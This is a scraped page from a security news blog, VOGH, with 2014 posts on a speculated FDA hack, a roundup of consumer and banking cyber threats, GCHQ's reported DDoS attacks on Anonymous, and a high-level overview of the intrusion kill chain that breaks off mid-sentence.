VOGH - VOICE OF GREYHAT | Leading Resource of Cyber Updates & Hacker News<br />
Voice Of GREYHAT (VOGH) is a Leading Cyber Security and Hacking News Source, dedicated to providing updates related to hacking, technology, malware, vulnerabilities and cyber threats to security experts, hackers and researchers worldwide.<br />
Published 2014-02-10: The U.S. Food & Drug Administration (FDA) Hack - What is Big Pharma Hiding From You?<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: red;"><strong><span style="font-family: inherit; font-size: large;">The </span></strong><span style="text-align: left;"><span style="font-size: large;"><b>Food & Drug Administration (</b></span></span></span><span style="font-family: inherit; font-size: large;"><span style="color: red;"><b>FDA) Hack </b>-</span> What is Big Pharma <b>Hiding From You?</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinjbY-y_xyggiJ9s3Ei7B4gyhw80yWJ-Yf71JLn9cJns5LDcVm4ZcCwun3CRXfzvEMmTWOLQhg-zhTap_8x1CStU4w9AhFdXzHRxJG86B1o2aMFt8GuoKYf16efvrcj37AK5sYWac4jrw/s1600/FDA-Hack-vogh-exclusive.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinjbY-y_xyggiJ9s3Ei7B4gyhw80yWJ-Yf71JLn9cJns5LDcVm4ZcCwun3CRXfzvEMmTWOLQhg-zhTap_8x1CStU4w9AhFdXzHRxJG86B1o2aMFt8GuoKYf16efvrcj37AK5sYWac4jrw/s1600/FDA-Hack-vogh-exclusive.jpg" height="250" width="500" /></a></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">During the summer of last year, there was a growing controversy
surrounding the FDA’s request to <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers </a>to expose holes in medical
device security, such as insulin devices and other wireless and
computer connected home and hospital devices. Understandably, many
<a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> and <a href="http://www.voiceofgreyhat.com/search?q=security+experts">security experts</a> were not particularly keen to attempt or
test the security of these devices, for fear of incorrect perception,
and potential outcry. In December last year, the FDA was itself the
target of a hacking operation, in particular the system used by
pharmaceutical companies to input data on drug tests, results, clinical
trials, and so on. Whether this was an attack by cyber thieves, as the
FDA claims, or</span><span style="font-family: inherit;"> </span><a href="http://www.voiceofgreyhat.com/2013/11/OpKillingBay-anonymous-threaten-japan-dolphin-hunt.html" style="font-family: inherit;" target="_blank">hacktivists</a><span style="font-family: inherit;"> </span><span style="font-family: inherit;">remains to be seen. </span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<strong><span style="font-family: inherit;">Corporate Theft or Exposing the Truth?</span></strong></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
The FDA, of course, was quick to denounce the attack as a cyber theft. The information <a href="http://medcitynews.com/2013/12/fda-hacked-pharmaceutical-companies-push-online-security-audit/" target="_blank">reported to have been accessed</a> included
medical trial data, marketing information and strategy, and information
about drug manufacturing. While on the surface we could very well
accept that this could be a simple case of corporate espionage, it is
worth remembering that any company that wants drug approval in the US
has to go through the FDA first. Is running the risk of potentially
alienating the very body that approves your products a strategy that a
multibillion-dollar pharmaceutical company would really undertake?
While it can’t be ruled out as a possibility, unless the hackers come
forward, it does seem unlikely. It’s also important to remember that
there is a large amount of controversy surrounding the pharmaceutical
industry all over the world, but especially in the States. Could
hacktivists have been responsible for the attack? If so, what could be
the causes for such an attack? As we will see, there may be more than we
might initially think.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<strong><span style="font-family: inherit;">Practice and Method - How Big Pharma Operates</span></strong></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
In the US alone, it is estimated that around <a href="http://www.cbsnews.com/news/study-shows-70-percent-of-americans-take-prescription-drugs/%20" target="_blank">70% of the population</a> takes
prescription drugs. Given that the number of people in the US is estimated
to be over 300 million, that is a staggering number. With such a large
number of people taking these drugs, addiction rates are rising rapidly -
so much so that prescription addicts are currently more common than
illegal drug addicts. It is a very real problem that continues to be
skirted around by the US regulators and administration. In fact, just
as knowing the signs of heroin or crack cocaine addiction was important
information for people who suspected they may have an addict
among friends or family, the same is now true for widely available
prescription drugs, and many Americans are being encouraged by drug charities and non-profit institutions to <a href="http://drugabuse.com/library/how-to-help-an-opiate-addict/" target="_blank">learn more about the potential causes and signs</a> of prescription drug abuse.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
At the center of this problem lies the pharmaceutical industry. Adverts
for medications are common, and standard practice for getting new drugs
to market includes rigging clinical trials to get the desired results in
clever ways that do not outright break the law, and invasive marketing
schemes aimed at family doctors and consumers, where doctors will often be
offered ‘sweeteners’ such as free lunches, travel to events, or even
help building their reputation as speakers at industry-funded
conferences. The FDA is also, despite being an independent regulatory
body, often effectively ‘bought out’ by companies looking to get drugs
to market fast. There is the additional problem that all drug test data
is not available for public consumption, meaning academics and doctors
are unable to view results of tests or trials for themselves. This has
led to a number of large lawsuits in the US and around the world, as
well as, in extreme cases, deaths directly related to withheld side
effects of new drugs.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<strong><span style="font-family: inherit;">Coincidence or Calculated?</span></strong></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
We might then speculate on the nature of the accessed data once again.
Bearing in mind the nature of how the industry operates, and the
information that was accessed, we could quite easily draw a link between
the two, and surmise that the hack may well have been the work of a
<a href="http://www.voiceofgreyhat.com/search?q=hacktivist">hacktivist</a> movement. Of course, there is no way to prove whether this
was the case or not, but given the ambitious actions of a number of
groups over the last few years, it certainly can’t be ruled out.</span></div>
<br />
<div class="yj6qo ajU">
<div aria-label="Show trimmed content" class="ajR" data-tooltip="Show trimmed content" id=":1rb" role="button" style="text-align: justify;" tabindex="0">
<b><u>Disclaimer:-</u></b> At perfection <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b> felicitates <b><a href="http://www.voiceofgreyhat.com/search/label/Eve%20Pearce">Eve Halton</a> </b>for sharing this luminous article with our readers. Eve is a very much passionate Fleet Street, she has done her graduation in International Business and Journalism. Eve, this time also you have done an eminent job, we love you :)<br />
<br /></div>
</div>
</div>
Author: Avik Sarkar<br />
Published 2014-02-10: What Risk We are Posing! Everyone Can Become Target of the Latest Cyber Security Threats <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="text-align: left;"><span style="font-size: large;"><b><span style="color: red;">What Risk We are Posing!</span></b> </span></span><span style="font-family: inherit; font-size: large;">Everyone Can Become a <b>Target</b> of the Latest <b><span style="color: red;">Cyber Security Threats</span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3egtwU-8h2Kb-nce90rC9I89MsATyZEGZF7z_uYx_ti1Ol5K-zTdORMr_G35x6JxCcO03r4p0cihBj0TfMNRbLBqqCRPr323HS0kQNDyy1BifXdLXXGRXyVaRkRNiNR7Gu5sOEEljmTU/s1600/cyber-threats-everyone-can-become-target.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3egtwU-8h2Kb-nce90rC9I89MsATyZEGZF7z_uYx_ti1Ol5K-zTdORMr_G35x6JxCcO03r4p0cihBj0TfMNRbLBqqCRPr323HS0kQNDyy1BifXdLXXGRXyVaRkRNiNR7Gu5sOEEljmTU/s1600/cyber-threats-everyone-can-become-target.jpg" height="280" width="450" /></a></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">According to a report by the </span><a href="http://articles.washingtonpost.com/2012-12-13/business/35789679_1_cybersecurity-firm-hackers-banks-in-recent-months" style="font-family: inherit;" target="_blank">Washington Post</a><span style="font-family: inherit;">,
hackers may soon be setting up a plan to unfold in 2013 that will
target 30 different U.S. banking institutions. </span><a href="http://www.voiceofgreyhat.com/search?q=McAfee" style="font-family: inherit;">McAfee Labs</a><span style="font-family: inherit;">, which has
compiled a new </span><a href="http://www.voiceofgreyhat.com/search?q=cyber+security" style="font-family: inherit;">cyber security </a><span style="font-family: inherit;">report, says that banks should be on the
lookout for software that creates false online transactions or targets
transfers tied to large dollar amounts.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Sources
say that these threats can all be tied back to <b>“Project Blitzkrieg”</b>,
which is a program that has been around since 2008. Within the past four
years, it has already stolen $5 million and plans to continue for as
long as possible. During the past few months, between 300 and 500
people located within the U.S. have fallen victim to Project
Blitzkrieg’s schemes. By the spring of 2013, McAfee says that things
could get even worse for U.S. banks and their customers.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Experts
note that this scheme may be tied to reports from back in October by
security company <a href="http://www.voiceofgreyhat.com/search?q=RSA">RSA</a> that mentioned how a hacker out of <a href="http://www.voiceofgreyhat.com/search?q=Russia">Russia</a> named
<b>“vorVzakone”</b> has been openly discussing his plan to recruit a team to
plan the largest Trojan attack tied to banking. McAfee warns that these
threats should be taken extremely seriously as the beginning of 2013 is
soon to unfold. The software can become extremely dangerous to those
doing their banking online because it can replicate transactions and
even delete e-mail notifications about certain transfers.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">While
<a href="http://www.voiceofgreyhat.com/search?q=bank">U.S. banks</a> will no doubt be increasing their security protocols to
protect themselves from any unnecessary attacks, most already know that
they are continually being cited as targets from hacking groups around
the globe. Back in September, both <a href="http://www.voiceofgreyhat.com/2012/09/Iran-Accused-Cyber-Attack-Against-US-Banks.html">JP Morgan Chase</a> and <a href="http://www.voiceofgreyhat.com/2012/09/US-banking-Financial-Sector-Suffering-From-DDoS-Attack.html">Bank of America</a>
saw their sites crash because of <a href="http://www.voiceofgreyhat.com/search?q=DDoS">DDoS attacks</a>.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<span style="text-decoration: underline;"><strong><span style="font-family: inherit;">Samsung Smart TV Dangers</span></strong></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><a href="http://www.theregister.co.uk/2012/12/12/smart_tv_pwned/" target="_blank">The Register</a> has
recently reported that Samsung’s newest Smart TV is completely open and
<a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerable</a> to hacking because it gives hackers the ability to steal
data very quickly. According to security company ReVuln, this
vulnerability most notably affects consumers who own and use their
Samsung 3D TVs for internet purposes.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Those who use their Smart TVs can rent movies, browse the web for a <a href="http://www.money.co.uk/landlines/cheap-line-rental.htm" target="_blank">cheap line rental</a>,
go on Facebook, and more. ReVuln claims that they have found an exploit
which allows hackers to see everything the user is doing while they are
using their TV, retrieve and <a href="http://vimeo.com/55174958" target="_blank">access information</a> like
web history, and hook up an external thumb drive to the TV to
conveniently steal all of this information for future use. While ReVuln
noticed this exploit while using a Samsung 3D TV, the true problem is
that it seems to affect all of the latest Samsung TVs with internet
capabilities, which includes many different makes and models.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">As
these TVs continue to act more like large PCs, it is only a matter of
time until we see even more security vulnerabilities tied to
them.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<span style="text-decoration: underline;"><strong><span style="font-family: inherit;">Gas Station Bluetooth Skimming</span></strong></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">
News site <a href="http://www.kcra.com/news/Thieves-use-Bluetooth-enabled-skimming-devices-at-gas-pumps/-/11797728/17726964/-/dpn6k9z/-/index.html" target="_blank">KCRA</a> out
of Sacramento notes that crooks are using <a href="http://www.voiceofgreyhat.com/search?q=Bluetooth">Bluetooth</a> devices in order to
steal <a href="http://www.voiceofgreyhat.com/search?q=credit+card">credit card</a> information from those who are paying for gas at the
pump. The biggest issue the <a href="http://www.voiceofgreyhat.com/search?q=security+experts">cyber security experts</a> noticed is that these
thieves do not even have to be near the gas station in order to steal
information.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Crooks
are using skimming devices that utilize Bluetooth and contain a variety
of common security keys that can be used to access gas pumps for
maintenance. They don’t simply pull out their device and begin swiping
information from oblivious consumers. Thieves will start by installing
skimmers on the pumps to collect information from those pumping gas and
then pick them back up. Detectives say that these types of devices are
impossible to detect.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">According
to experts, thieves can be up to 100 yards away and continually collect
credit card information from unsuspecting users. Because of this, these
crooks are impossible to detect, and the problem may only grow larger
in the near future.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<span style="text-decoration: underline;"><strong><span style="font-family: inherit;">Troublesome QR Codes</span></strong></span></div>
<br />
<div style="text-align: justify;">
<span style="font-family: inherit;">
QR codes seem to be everywhere these days. They’re typically on
everything from advertisements to products that we purchase on a daily
basis. In the Netherlands, hackers are posting QR codes in heavily
trafficked areas like airports and major streets. When these QR codes
are scanned by a user’s smartphone, the user is taken to a malicious
website that may attempt to phish information from the user or possibly
infect their <a href="http://www.voiceofgreyhat.com/search?q=smartphone">smartphone</a> with <a href="http://www.voiceofgreyhat.com/search?q=malware">malware</a>.</span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: justify;">
<b><u>Disclaimer:-</u></b> Before perfection, on behalf of <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b>, I would like to personally thank <b>Eve Halton </b>for sharing this magnificent article with our readers. Eve is a very much passionate Fleet Street, she has done her graduation in International Business and Journalism. She gained decent experience in writing articles on several fields like global politics, economics, sustainability issues, cyber security & many more.</div>
</div>
Author: Avik Sarkar<br />
Published 2014-02-10: British Spy Agency GCHQ Performed DDoS Attack Against Anonymous - Snowden Documents Transpired<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;">British Spy Agency<b> GCHQ</b> Performed<b><span style="color: red;"> DDoS Attack</span></b> Against Hacktivist <b>Anonymous</b> & <b>LulzSec</b> -<b><span style="color: red;">Snowden Documents Transpired</span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTE1cIMwsy25Jo5SIVRDofPyvztNO19rfv1eN761TnLZgRsgzwGlfikMNAQa0Sz-Gb41w14ba6QyrHZh-QDT6DNWPrx-FN3WYcuAh3WZLp0KCxciWWOj9KHZ1_wiNdH_6OCMVvR6umY5k/s1600/gchq-ddos-hacktivist-anonymous.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTE1cIMwsy25Jo5SIVRDofPyvztNO19rfv1eN761TnLZgRsgzwGlfikMNAQa0Sz-Gb41w14ba6QyrHZh-QDT6DNWPrx-FN3WYcuAh3WZLp0KCxciWWOj9KHZ1_wiNdH_6OCMVvR6umY5k/s1600/gchq-ddos-hacktivist-anonymous.jpg" height="325" width="600" /></a></div>
<div style="text-align: justify;">
Looking back, it has always been <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminal">cyber criminals</a> and large <a href="http://www.voiceofgreyhat.com/search?q=hacker+collective">hacker collective</a> groups that were found to be behind large-scale <a href="http://www.voiceofgreyhat.com/search?q=ddos">denial of service attacks</a>. That story took a one-hundred-and-eighty-degree turn when the former <a href="http://www.voiceofgreyhat.com/search?q=NSA">NSA</a> contractor <a href="http://www.voiceofgreyhat.com/search?q=Edward+Snowden"><b>Edward Snowden</b></a> revealed another <a href="http://www.voiceofgreyhat.com/search?q=secret">trade secret</a>. A lurid story has recently come into the spotlight, as the <a href="http://www.voiceofgreyhat.com/search?q=whistle+blower">whistleblower</a> Snowden disclosed yet another set of secret documents taken from the <a href="http://www.voiceofgreyhat.com/search?q=NSA">National Security Agency</a>. The clandestine documents take the mask off the so-called good guys, revealing that <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">British spy agency GCHQ</a> had launched a secret war against the infamous <a href="http://www.voiceofgreyhat.com/search?q=hacktivist">hacktivist</a> collective <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a> and a splinter group known as <a href="http://www.voiceofgreyhat.com/search/label/lulzsec">LulzSec</a> several years ago. As many of you guessed, this happened when <a href="http://www.voiceofgreyhat.com/search?q=Anonymous">Anonymous</a> was targeting various <a href="http://www.voiceofgreyhat.com/search?q=UK">UK companies </a>and <a href="http://www.voiceofgreyhat.com/search?q=UK+Government">government</a> websites. 
The documents disclose that <a href="http://www.voiceofgreyhat.com/search?q=GCHQ">GCHQ</a> carried out seemingly illegal <a href="http://www.voiceofgreyhat.com/search?q=DDoS">DDoS attacks</a> against the collective, flooding their chatrooms with so much traffic that they would become inaccessible – and all with the approval of the British government. The revelations come less than a year after several <a href="http://www.voiceofgreyhat.com/search?q=LulzSec">LulzSec</a> activists were <a href="http://www.voiceofgreyhat.com/search?q=jailed">jailed</a> by a British court for carrying out similar DDoS attacks against targets including the <a href="http://www.voiceofgreyhat.com/search?q=CIA">CIA</a>, the <a href="http://www.voiceofgreyhat.com/search?q=SOCA">UK’s Serious Organized Crime Agency (SOCA)</a>, News International, <a href="http://www.voiceofgreyhat.com/search?q=Sony">Sony</a> and the Westboro Baptist Church, among others. </div>
<div style="text-align: justify;">
This sensational issue was made public by <a href="http://www.voiceofgreyhat.com/search?q=NBC"><b>NBC News</b></a> with the help of none other than <a href="http://msnbcmedia.msn.com/i/msnbc/sections/news/snowden_anonymous_nbc_document.pdf">Edward Snowden</a>. In its exclusive report headlined<b> <a href="http://www.nbcnews.com/news/investigations/war-anonymous-british-spies-attacked-hackers-snowden-docs-show-n21361">'War on Anonymous: British Spies Attacked Hackers,'</a></b> NBC said: The blunt instrument the spy unit used to target hackers, however, also interrupted the web communications of political dissidents who did not engage in any illegal hacking. It may also have shut down websites with no connection to Anonymous. According to the documents, a division of Government Communications Headquarters (GCHQ), the British counterpart of the NSA, shut down communications among Anonymous hacktivists by launching a “denial of service” (DDOS) attack – the same technique hackers use to take down bank, retail and government websites – making the British government the first Western government known to have conducted such an attack.</div>
<div style="text-align: justify;">
The documents, from a PowerPoint presentation prepared for a 2012 NSA conference called <b>SIGDEV</b>, show that the unit known as the Joint Threat Research Intelligence Group, or <b>JTRIG</b>, boasted of using the DDOS attack – which it dubbed Rolling Thunder -- and other techniques to scare away 80 percent of the users of Anonymous internet chat rooms. </div>
<div style="text-align: justify;">
The existence of JTRIG has never been previously disclosed publicly. The documents also show that JTRIG infiltrated chat rooms known as IRCs and identified individual hackers who had taken confidential information from websites. In one case JTRIG helped send a hacktivist to prison for stealing data from PayPal, and in another it helped identify hacktivists who attacked government websites. </div>
<div style="text-align: justify;">
As soon as this story hit the spotlight, GCHQ responded by saying that <b>all their movements and operations were lawful</b>. <i>“All of GCHQ’s work is carried out in accordance with a strict legal and policy framework which ensure[s] that our activities are authorized, necessary and proportionate, and that there is rigorous oversight, including from the Secretary of State, the Interception and Intelligence Services Commissioners and the Parliamentary Intelligence and Security Committee. All of our operational processes rigorously support this position.”</i> GCHQ told the press. To know more about this story, stay tuned to <a href="http://www.voiceofgreyhat.com/"><b>VOGH</b></a>. </div>
</div>
Author: Avik Sarkar<br />
Published 2014-02-10: Implementing Intrusion (Cyber) Kill Chain - A Plenary Overview <div dir="ltr" style="text-align: left;" trbidi="on">
<h1 align="center" style="text-align: center;">
<span style="font-weight: normal;">Implementing an </span><span style="color: red;">Intrusion (Cyber) Kill Chain <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqDWtLeRX67so-tEjpRAQvVCQ2tU7FxNiVBdS4Ys9834_1gLHabv13zBxeqzZKKUa24DU5dwk3k4ycf9_PC0Ydxh12g5nM2K75pJqvX5EdgagNX-yXAILWUD9PWOdHvb47FJzx02if-Vs/s1600/Implementing-Intrusion-Kill-Chain.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqDWtLeRX67so-tEjpRAQvVCQ2tU7FxNiVBdS4Ys9834_1gLHabv13zBxeqzZKKUa24DU5dwk3k4ycf9_PC0Ydxh12g5nM2K75pJqvX5EdgagNX-yXAILWUD9PWOdHvb47FJzx02if-Vs/s1600/Implementing-Intrusion-Kill-Chain.jpg" height="255" width="500" /></a></div>
</span></h1>
<div class="MsoBodyText">
<div style="text-align: justify;">
The Intrusion (Cyber) Kill Chain is a phrase popularized
by infosec industry professionals and introduced in a Lockheed Martin
Corporation paper titled “<a href="http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf">Intelligence
Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and
Intrusion Kill Chains</a>”. </div>
</div>
<div class="MsoBodyText">
<div style="text-align: justify;">
The intrusion kill chain model is derived from a military
model describing the phases of an attack. The phases of the military model are:
find, fix, track, target, engage, and assess. The analyses of these phases are
used to pinpoint gaps in capability and prioritize the development of needed
systems. The first phase in this military model is to decide on a target
(find). Second, once the target is decided, you set about locating it (fix). Next,
you surveil it to gather intelligence (track). Once you have enough
information, you decide the best way to realize your objective (target) and
then implement your strategy (engage). Finally, you analyze what went wrong
and what went right (assess) so that adjustments can be made in future attacks.</div>
</div>
<div class="MsoBodyText">
<div style="text-align: justify;">
Lockheed Martin analysts began by mapping the phases of
cyber attacks. The mapping focused on a specific type of attack, Advanced
Persistent Threats (APTs), in which the adversary/intruder gets into your network and
stays for years, sending information, usually encrypted, to collection sites
without being detected. Since the intruder spent so much time in the network,
analysts were able to gather data about what was happening. Analysts could then
sift through the data and begin grouping it into the military attack model
phases. Analysts soon realized that while there were predictable phases in
cyber attacks, the phases were slightly different from the military model. The intrusion (cyber) kill chain, shown below,
describes the phases of a cyber attack.</div>
</div>
<div class="MsoBodyText">
<div style="text-align: justify;">
The chain of events or activities is as follows:</div>
</div>
<div class="MsoBodyText">
<o:p> </o:p> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl7iZqE5Xk5H6FkkjxWqcdlO5Mm8P0DxbLmK4h-dzlwGwfh1ngEMCX1li2AnR07dXncHUig0FeI2vobNI5S8Cj7G57TagoMmG4Bly1nLf9HQnZ1Hur0-SFHsrdRmZABHNBsyfBmmUsKQ4/s1600/Intrusion-chain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl7iZqE5Xk5H6FkkjxWqcdlO5Mm8P0DxbLmK4h-dzlwGwfh1ngEMCX1li2AnR07dXncHUig0FeI2vobNI5S8Cj7G57TagoMmG4Bly1nLf9HQnZ1Hur0-SFHsrdRmZABHNBsyfBmmUsKQ4/s1600/Intrusion-chain.png" height="56" width="600" /></a></div>
<br />
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 2.75pt; mso-padding-alt: 2.75pt 2.75pt 2.75pt 2.75pt; mso-table-layout-alt: fixed;">
<tbody>
<tr>
<td style="background: #CCCCCC; border-right: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-top-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
Link in the Chain</div>
</td>
<td style="background: #CCCCCC; border: solid black 1.0pt; mso-border-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Description</div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
1. Reconnaissance</div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Research, identification and selection of targets:
scraping websites for information on companies and their employees in order
to select targets.</div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
2. Weaponization</div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Most often, a Trojan with an exploit embedded in
documents, photos, etc.</div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
3. Delivery<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Transmission of the weapon (document with an embedded
exploit) to the targeted environment.
According to Lockheed Martin's Computer Incident Response Team
(LM-CIRT), the most prevalent delivery methods are email
attachments, websites, and USB removable media.</div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
4. Exploitation<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
After the weapon is delivered, the intruder's code is
triggered to exploit an operating system or application vulnerability, to
make use of an operating system's auto execute feature or exploit the users
themselves.<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
5. Installation<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Along with the exploit, the weapon installs a remote
access Trojan and/or a backdoor that allows the intruder to maintain presence
in the environment.</div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
6. Command and
Control<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
Intruders establish a connection to an outside
collection server from compromised systems and gain 'hands on the keyboard'
control of the target's compromised network/systems/applications.<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: solid black 1.0pt; border-right: none; border-top: none; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 116.2pt;" valign="top" width="155"><div class="TableContents">
7. Actions on
Objective<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
After progressing through the previous 6 phases, the
intruder takes action to achieve their objective. The most common objectives are: data extraction, disruption of the network,
and/or use of the target's network as a hop point.<o:p></o:p></div>
</td>
</tr>
</tbody></table>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
While mapping the intruder's activities, Lockheed Martin's
analysts also discovered that a break (kill) in any one link in the
chain would cause the intrusion to fail in its objective. This is one of the
major benefits of the intrusion kill chain framework, as security professionals
have traditionally taken a defensive approach when it comes to incident
response. It means that intrusions can be dealt with offensively too.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
Lockheed Martin's case studies reveal that knowledge
about previous intrusions and how they were accomplished allows analysts to
